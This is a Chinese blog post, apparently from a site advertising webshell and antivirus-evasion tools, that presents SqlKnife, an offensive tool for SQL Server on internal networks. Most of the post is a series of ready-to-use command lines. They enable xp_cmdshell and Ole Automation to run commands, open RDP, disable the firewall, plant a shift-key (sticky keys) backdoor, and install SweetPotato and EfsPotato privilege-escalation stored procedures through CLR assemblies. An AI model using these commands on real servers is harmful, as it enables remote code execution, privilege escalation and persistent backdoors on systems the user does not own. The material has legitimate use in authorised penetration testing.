会飞的鱼

首页 » 渗透工具 » SqlKnife 适合在命令行中使用的轻巧的SQL Server数据库安全检测工具

SqlKnife 适合在命令行中使用的轻巧的SQL Server数据库安全检测工具

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。

0x01 介绍

作者:hl0rey

团队:0x727,未来一段时间将陆续开源工具,地址:https://github.com/0x727

定位:内网SQL Server数据库安全检测

语言:C++、C#

功能:在命令行下对SQL Server进行命令执行、提权等安全检测操作

0x02 安装

无其他额外依赖

0x03 效果展示

使用xp_cmshell执行命令

恢复xp_cmdshell

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd --fix

Snipaste_2021-08-03_10-46-29

执行命令

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd -c whoami

Snipaste_2021-08-03_10-47-04

禁用xp_cmdshell

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd --remove

Snipaste_2021-08-03_10-47-56

使用Ole Automation Procedures执行命令

无回显,不好用

恢复Ole Automation Procedures

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --oacreate --fix

Snipaste_2021-08-03_10-55-46

执行程序

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --oacreate -c calc.exe

Snipaste_2021-08-03_10-55-46

Snipaste_2021-08-03_10-56-34

开RDP,关防火墙加规则(开RDP时自动加),劫持shift键

权限足够的前提下,基于注册表的操作

开启RDP

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --openrdp

Snipaste_2021-08-03_11-36-43

Snipaste_2021-08-03_11-36-57

关防火墙

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --disfw

(可能不好用,可能是因为注册表位置参考windows10的原因)

Snipaste_2021-08-03_11-42-58

劫持shift键

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --shift

Snipaste_2021-08-03_11-45-54

Snipaste_2021-08-03_11-29-11

PotatoInSQL

将土豆提权(--dbup)作为存储过程安装到数据库,然后调用。

安装.net3.5版本的potatoinsql

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --dbup --fix --3

Snipaste_2021-08-03_11-17-47

Snipaste_2021-08-03_11-18-02

利用土豆执行命令

SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --dbup -c whoami

Snipaste_2021-08-03_11-28-46

Snipaste_2021-08-03_11-29-11

EfsPotato

安装并执行命令

启用/还原配置功能

Snipaste_2021-08-03_11-29-35

做完操作之后把配置和CLR程序集清理掉。

--fix参数和--remove参数只涉及--xpcmd、--oacreate、--clrcmd、--clrdexec、--dbup

指定不同版本clr的payload

--3/--4 如果不加这个参数,默认是.net4版本的payload

0x04 使用方法

语法功能
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd --fix启用xp_cmdshell,其他fix类型功能都是这个格式
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd -c whoami使用xp_cmdshell执行命令,其他命令执行功能也是这个格式
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --xpcmd --remove禁用xp_cmdshell,其他remove类型功能也是这个格式
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --oacreate --fix恢复Ole Automation Procedures
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --oacreate -c calc.exeOle Automation Procedures执行程序
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --openrdp开启RDP
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --disfw关闭防火墙
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --shift劫持shift键
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --dbup --fix --3安装.net3.5的甜土豆提权存储过程,如果安装.net4.0的话就是--4
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p [email protected] --dbup -c whoami利用甜土豆执行命令
SqlKnife.exe -H 192.168.49.143 -u sa -p [email protected] --dbup2 --3 --fix安装.net3.5的EfsPotato提权存储过程,如果安装.net4.0的话就是--4
SqlKnife.exe -H 192.168.49.143 -u sa -p [email protected] --dbup2 -c whoami使用EfsPotato执行命令

0x06 实现原理

使用windows ADO连接SQL server数据库无需其他额外依赖,使用C#编写SQL CLR利用payload。

0x07 新增功能

2021.8.5 新加入EfsPotato,本质是zcgonvh的EfsPotato,感谢zcgonvh

 

项目地址:https://github.com/0x727/SqlKnife_0x727

文章如无特别注明均为原创! 作者: admins, 转载或复制请以 超链接形式 并注明出处 Xise菜刀_Xise菜刀下载_中国菜刀_免杀大马_最新免杀大马
原文地址《 SqlKnife 适合在命令行中使用的轻巧的SQL Server数据库安全检测工具》发布于2021-9-12

分享到:
打赏

评论

游客

看不清楚?点图切换
切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册